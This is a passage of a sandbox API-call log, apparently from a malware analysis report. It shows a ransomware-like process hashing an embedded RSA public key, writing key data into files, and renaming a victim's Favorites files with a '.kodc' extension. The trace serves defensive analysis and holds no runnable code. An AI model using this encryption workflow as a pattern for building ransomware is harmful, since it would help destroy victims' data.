KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.406] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0101.407] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.407] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.407] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.407] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.407] GetLastError () returned 0x0 [0101.407] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.407] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0101.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.407] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.407] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.407] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.407] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5e48 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f68 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5e90 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f80 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fb0 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fc8 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.408] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fb0 | out: hHeap=0x630000) returned 1 [0101.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fc8 | out: hHeap=0x630000) returned 1 [0101.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.408] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7fc8 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7fb0 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.408] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fc8 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fb0 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.409] GetCurrentThreadId () returned 0x42c [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7df8 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.409] GetCurrentThreadId () returned 0x42c [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.409] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.409] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fb0 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fc8 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f98 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7fe0 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fb0 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fb0 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fb0 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.411] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fe0 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fc8 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f98 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f80 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5e90 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.412] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x80, lpOverlapped=0x0) returned 1 [0101.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.413] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.413] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.413] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.413] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.413] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.413] CloseHandle (hObject=0x5cc) returned 1 [0101.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.426] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0101.426] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.426] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.kodc")) returned 1 [0101.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0101.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.427] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0101.428] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0101.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0101.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0101.428] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0101.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.429] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.429] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.432] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.432] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.433] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.433] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.434] lstrlenA (lpString="-----BEGIN PUBLIC 